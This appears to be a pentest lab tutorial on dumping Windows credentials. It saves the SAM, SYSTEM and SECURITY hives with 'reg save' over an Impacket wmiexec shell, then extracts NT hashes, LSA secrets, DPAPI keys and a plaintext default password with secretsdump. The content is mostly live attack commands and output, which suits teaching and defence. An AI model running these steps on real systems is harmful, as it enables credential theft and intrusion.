=================================================================================================================================
OS Credential Dumping (Registry) using the Windows 'reg save' command
=================================================================================================================================

Our objective is to:
- extract the password hashes of the local accounts stored in the registry hive HKLM\SAM 
  (the syskey to decrypt the registry hive HKLM\SAM is stored in the registry hive HKLM\SYSTEM)
- extract LSA secrets from registry (HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets)
- extract the cached password hashes (of domain accounts that logged on the Windows computer) stored in the registry hive HKLM\SECURITY 

A valid local or domain Windows account member of the 'local administrator' group is required copy the registry hives SAM/SYSTEM/SECURITY.

Usefull links: 
> https://attack.mitre.org/techniques/T1003/002/
> https://attack.mitre.org/techniques/T1003/004/
> https://attack.mitre.org/techniques/T1003/005/

The Windows native command 'reg save' can be used to dump the Windows registry hives SAM/SYSTEM/SECURITY.


==================================================================================================================================
Example 1. Use the command 'reg save' to dump the Windows registry hives (SAM/SYSTEM/SECURITY) and then extract the Windows
           password hashes, cached passwords and LSA secrets from the copied registry hives using Secretsdump
==================================================================================================================================

-----------------------------------------------------------------------------------------------------
Step 1 - Use the command 'reg save' to dump the Windows Windows registry hives (SAM/SYSTEM/SECURITY) 
-----------------------------------------------------------------------------------------------------

jeff@kali:~/Documents/Tools/Sysinternals$ wmiexec.py administrator@192.168.1.50
Impacket v0.9.21.dev1 - Copyright 2020 SecureAuth Corporation
Password:
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands

C:\>cd temp

C:\temp>reg SAVE HKLM\SAM C:\temp\sam.hive
The operation completed successfully.

C:\temp>reg SAVE HKLM\SYSTEM C:\temp\system.hive
The operation completed successfully.

C:\temp> reg SAVE HKLM\SECURITY C:\temp\security.hive
The operation completed successfully.

C:\temp>get sam.hive
[*] Downloading C:\\temp\sam.hive

C:\temp>get security.hive
[*] Downloading C:\\temp\security.hive

C:\temp>get system.hive
[*] Downloading C:\\temp\system.hive


---------------------------------------------------------------------------------------------------------
Step 2 - Download the copied files on a Kali VM & then extract the credentials with the tool Secretsdump 
---------------------------------------------------------------------------------------------------------

jeff@kali:~/Documents/CTFs/BadBlood$ secretsdump.py -sam ./sam.hive -security ./security.hive -system ./system.hive LOCAL

Impacket v0.9.21.dev1 - Copyright 2020 SecureAuth Corporation

[*] Target system bootKey: 0x941140bd825386b732031d5c5b01ae8a

[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:1d6fcbd306077d663e23<SNIP>
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c0<SNIP>

[*] Dumping cached domain logon information (domain/username:hash)
<snip>

[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
$MACHINE.ACC:plain_password_hex:5ea4362d9395d858877c59ddf0cc0d2ae4961b4f<SNIP>
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:540ddc43f8c664881760a1259<SNIP>

[*] DefaultPassword 
(Unknown User):ROOT#123

[*] DPAPI_SYSTEM 
dpapi_machinekey:0x3bef35d8b9ddf267aac8ed41ce41c1a9d9d59382
dpapi_userkey:0x931d191734e96d32cab6f3a0950e0d30204b5377
[*] NL$KM 
 0000   08 26 6A A5 52 EB F1 C3  BF 0E 76 5C B4 C9 C8 1A   .&j.R.....v\....
 0010   E7 57 D5 64 4D 75 CD 0E  41 64 D3 00 B7 B7 F2 DA   .W.dMu..Ad......
 0020   77 1C 3B E0 F5 7E B1 FF  2C 9B 8D 8B 6A 8A 8D 0A   w.;..~..,...j...
 0030   E2 46 DA 0D CA E7 A7 AE  79 B1 35 19 7E D1 E7 F2   .F......y.5.~...
NL$KM:08266aa552ebf1c3bf0e765cb4c9c81ae757d5644d75cd0e4164d300b7b7f2da771c3be0f57eb1ff2c9b8d8b6a8a8d0ae246da0dcae7<SNIP>

[*] Cleaning up... 
